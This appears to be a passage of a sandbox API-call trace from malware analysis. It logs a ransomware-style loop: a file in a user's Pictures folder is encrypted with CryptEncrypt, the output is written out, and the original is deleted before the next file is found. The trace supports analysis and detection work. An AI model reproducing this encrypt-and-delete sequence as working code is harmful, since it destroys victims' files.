RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0092.514] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0092.515] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0092.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0092.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0092.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0092.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0092.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797008 [0092.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0092.517] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0092.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0092.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0092.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0092.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0092.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0092.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1797108 [0092.519] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797108, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0092.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0092.520] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2800, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2800*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0092.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2668 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0092.521] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0092.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0092.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0092.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.522] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0092.522] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.522] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.522] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0092.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.523] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x6f4b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x6f50) returned 1 [0092.523] CharLowerBuffW (in: lpsz="byte[28497]", cchLength=0xb | out: lpsz="byte[28497]") returned 0xb [0092.524] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.524] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0092.524] CryptEncrypt (in: hKey=0x41ac700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x452ae18*, pdwDataLen=0x144e538*=0x6f4b, dwBufLen=0x6f50 | out: pbData=0x452ae18*, pdwDataLen=0x144e538*=0x6f50) returned 1 [0092.524] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.524] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.525] WriteFile (in: hFile=0x298, lpBuffer=0x451cf68*, nNumberOfBytesToWrite=0x6f50, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x451cf68*, lpNumberOfBytesWritten=0x144ef3c*=0x6f50, lpOverlapped=0x0) returned 1 [0092.526] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0092.526] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca8c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0092.527] CryptDestroyKey (hKey=0x41ac700) returned 1 [0092.527] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.527] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0092.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0092.527] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.527] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0092.527] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0092.527] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0092.527] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.527] FreeLibrary (hLibModule=0x756e0000) returned 1 [0092.527] CloseHandle (hObject=0x258) returned 1 [0092.528] CloseHandle (hObject=0x298) returned 1 [0092.529] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png", lpFilePart=0x0) returned 0x34 [0092.529] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7mfkscm1jm586ad_.png")) returned 0x20 [0092.530] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8926ac0, ftCreationTime.dwHighDateTime=0x1d5f077, ftLastAccessTime.dwLowDateTime=0x260c180, ftLastAccessTime.dwHighDateTime=0x1d5e6a7, ftLastWriteTime.dwLowDateTime=0x260c180, ftLastWriteTime.dwHighDateTime=0x1d5e6a7, nFileSizeHigh=0x0, nFileSizeLow=0x6f4b, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7mFkSCM1jm586Ad_.png", cAlternateFileName="7MFKSC~1.PNG")) returned 0x41ac280 [0092.530] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7mfkscm1jm586ad_.png")) returned 1 [0092.583] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8926ac0, 